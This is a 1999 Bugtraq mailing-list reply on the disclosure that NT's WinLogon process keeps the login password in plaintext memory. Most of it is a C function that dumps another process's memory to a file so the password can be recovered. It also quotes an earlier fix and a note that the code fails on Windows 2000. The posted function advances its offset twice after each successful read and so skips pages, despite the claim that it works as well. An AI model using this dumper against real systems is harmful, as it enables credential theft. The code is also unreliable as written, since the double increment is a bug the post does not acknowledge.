Bugtraq mailing list archives
Re: NT WinLogon VM contains plaintext password visible in admin m ode
From: rhorvick () GREATPLAINS COM (Robert Horvick)
Date: Thu, 16 Dec 1999 13:11:21 -0600
Actually there is a large bug in the code (well - it works just as well but
thousands of times faster and is more correct):
There is no reason to look beyond the application min and max address range
and no reason to read in anything other then page sizes (since a
VirtualAlloc will always round to at least the next largest page size).
This was how I should have written it to begin with but I got lazy :)
DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
{
LPSTR lpOffset = 0;
LPSTR lpBuf = 0;
DWORD dwRead = 0;
BOOL bLastRead = FALSE;
DWORD dwDumpedBytes = 0;
SYSTEM_INFO si = {0};
FILE *f = 0;
f = fopen(szPath, "wb");
if(f)
{
GetSystemInfo(&si);
lpBuf = (LPSTR)malloc(si.dwPageSize + 1);
for(lpOffset = si.lpMinimumApplicationAddress;
(void*)lpOffset <= si.lpMaximumApplicationAddress;
lpOffset += si.dwPageSize)
{
if(ReadProcessMemory( hProc,
lpOffset,
lpBuf,
si.dwPageSize,
&dwRead))
{
if(bLastRead)
{
fwrite(lpBuf, 1, dwRead, f);
}
else
{
fprintf(f, "\noffset %lx\n", lpOffset);
fwrite(lpBuf, 1, dwRead, f);
bLastRead = TRUE;
}
dwDumpedBytes += dwRead;
lpOffset += si.dwPageSize;
}
else
{
bLastRead = FALSE;
}
}
fclose(f);
}
else
{
fprintf(stderr, "Unable to open %s", szPath);
}
return dwDumpedBytes;
}
-----Original Message-----
From: Jorge_Miguel_Pinto () BancoBPI PT
[mailto:Jorge_Miguel_Pinto () BancoBPI PT]
Sent: Thursday, December 16, 1999 9:48 AM
To: rhorvick () GREATPLAINS COM
Cc: BUGTRAQ () SECURITYFOCUS COM
Subject: RE: NT WinLogon VM contains plaintext password visible in admin
m ode
I am sorry, but only read this today...
There is small bug in this code...
<! LPSTR lpOffset = (void*)1;
!> LPSTR lpOffset = (LPSTR)1;
This also doesn't work on Windows 2000 Professional, SRV and Adv Srv.
Greetings,
J.
Current thread:
- Re: NT WinLogon VM contains plaintext password visible in admin m ode Robert Horvick (Dec 16)